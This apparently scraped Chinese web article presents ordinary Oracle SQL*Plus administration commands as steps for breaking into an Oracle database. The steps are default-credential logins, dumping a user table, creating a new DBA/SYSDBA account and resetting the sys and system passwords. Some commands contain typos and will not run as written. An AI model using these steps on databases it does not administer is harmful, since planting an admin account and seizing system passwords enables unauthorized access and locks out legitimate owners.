驱动管家:安全、高效、精准的专业驱动下载站!

怎么入侵Oracle数据库?使用了这些操作命令

2018-03-12 16:30:19责编:llp   来源:驱动管家     人气:

本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。 

怎么入侵Oracle数据库?使用了这些操作命令

1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; 

3、SQL>connect / as sysdba ;(as sysoper)或 

connect internal/oracle AS SYSDBA ;(scott/tiger) 

conn sys/change_on_install as sysdba; 

4、SQL>startup; 启动数据库实例 

5、 查看当前的所有数据库: 

select * from v$database; 

select name from v$database; 

desc v$databases; 查看数据库结构字段 

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限: 

SQL>select * from V_$PWFILE_USERS; 

Show user;查看当前数据库连接用户 

7、进入test数据库:database test; 

8、查看所有的数据库实例:select * from v$instance; 

如:ora9i 

9、查看当前库的所有数据表: 

SQL> select TABLE_NAME from all_tables; 

select * from all_tables; 

SQL> select table_name from all_tables where table_name like '%u%'; 

TABLE_NAME 

------------------------------ 

_default_auditing_options_ 

10、查看表结构:desc all_tables; 

11、显示CQI.T_BBS_XUSER的所有字段结构: 

desc CQI.T_BBS_XUSER; 

12、获得CQI.T_BBS_XUSER表中的记录: 

select * from CQI.T_BBS_XUSER; 

13、增加数据库用户: 

create user test11 identified by test defaulttablespace users Temporary TABLESPACE Temp; 

14、用户授权: 

grant connect,resource,dba to test11; 

grant sysdba to test11; 

commit; 

15、更改数据库用户的密码:(将sys与system的密码改为test.) 

alter user sys indentified by test; 

alter user system indentified by test;

  • 怎么破解40位的md5加密?40位的md5加密破解之法

    怎么破解40位的md5加密?40位的md5加密破解之法

    一般网站后台管理员密码都是经过MD5加密的,差不多都是16位和32位的,如果第一次碰到40位的加密,还真反映不过来,其实都是一样的。7a57a5a743894a0e4a801fc343894a0e4a801fc3原文是admin这个实际上还是MD5加密,

    详情2018-01-16 15:26:38责编:llp   来源:驱动管家     
  • 保存软件程序代码内存的方法 这个简单函数可以办到

    保存软件程序代码内存的方法 这个简单函数可以办到

    有时,有些软件有保护,看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来!我写了一个简单的函数,调用一下就可以把DLL和EXE的内存里的信息全部导到文件里!到时再慢慢查吧!usesTlHelp32;procedure

    详情2018-02-14 19:12:59责编:llp   来源:驱动管家     
  • 防止入侵和攻击有哪些技术?访问控制技术有哪些内容?

    防止入侵和攻击有哪些技术?访问控制技术有哪些内容?

    网络管理人员应认真分析各种可能的入侵和攻击形式,制定符合实际需要的网络安全策略,防止可能从网络和系统内部或外部发起的攻击行为,重点防止那些来自具有敌意的国家、企事业单位、个人和内部恶意人员的攻击。

    详情2018-02-26 19:07:38责编:llp   来源:驱动管家     
  • 金山毒霸有哪些漏洞?这些漏洞如何修复?

    金山毒霸有哪些漏洞?这些漏洞如何修复?

    金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下。第一个简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限详细说明:http: labs duba net kws feedback2 his php?uuid=622D

    详情2018-03-09 08:51:46责编:llp   来源:驱动管家     
  • 网站漏洞修复 iss短文件名泄露漏洞怎么修复?

    网站漏洞修复 iss短文件名泄露漏洞怎么修复?

    IIS短文件名泄露漏洞 WASC Threat Classification描述: Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。1 Internet Information Services(IIS,互联网信息服

    详情2018-02-05 17:05:15责编:llp   来源:驱动管家     
  • 不是直接输出的隐蔽的xss漏洞:dom xss怎么查找?

    不是直接输出的隐蔽的xss漏洞:dom xss怎么查找?

    Xss的危害各位小牛 大牛们都意识到了Xss开始的csrf和挂马 到盗cookies和ajax 到xssshell 还有各种利用 我们一般找到的都是大多数都停留在找直接输入输出上,这类型的一般很容易被过滤。隐蔽型的就是DOM xs

    详情2018-02-10 12:28:54责编:llp   来源:驱动管家     
  • 精灵宝可梦go存在哪些风险?精灵宝可梦go的权限问题

    精灵宝可梦go存在哪些风险?精灵宝可梦go的权限问题

    《Pokémon Go》是任天堂Pokémon(中译名口袋妖怪、宠物小精灵、精灵宝可梦)系列的最新游戏,由 Niantic Labs 联合开发,也是第一款 Pokémon 手游。不需多说,看到这篇文章的你,多半

    详情2018-01-16 14:25:16责编:llp   来源:驱动管家     
  • filezilla怎么用?filezilla server的安装和配置

    filezilla怎么用?filezilla server的安装和配置

    Filezilla的主要优势在于:高安全、高性能。Filazilla的安全性是来自于其开放源代码的。开源为何能保证安全?每一款软件产品诞生后,都有很多人试图发现其漏洞进行攻击,以获取权限和其他利益。如果是开源软件,

    详情2018-01-26 10:57:51责编:llp   来源:驱动管家     
  • isis常用工具有哪些?哪款isis通讯工具安全性强?

    isis常用工具有哪些?哪款isis通讯工具安全性强?

    网络通讯这么发达,自然只要与时俱进的人都会使用通讯工具,打电话的人越来越少了,其实不只是我们在使用微信等通讯工具,全世界的人都在使用各种通讯APP,包括IS成员,那么,这些IS成员究竟是用什么软件来保密自

    详情2018-03-08 11:09:55责编:llp   来源:驱动管家     
  • 使用microsoft internet explorer访问带恶意ftp url网页会受到攻击

    使用microsoft internet explorer访问带恶意ftp url网页会受到攻击

    microsoft internet explorer是微软发布的非常流行的WEB浏览器。如果用户访问了包含有恶意FTP URL的网页的话,Internet Explorer 5和6解码可能无法正确地过滤URL,强制Internet Explorer通过在HTML元素所提

    详情2018-01-22 13:21:01责编:llp   来源:驱动管家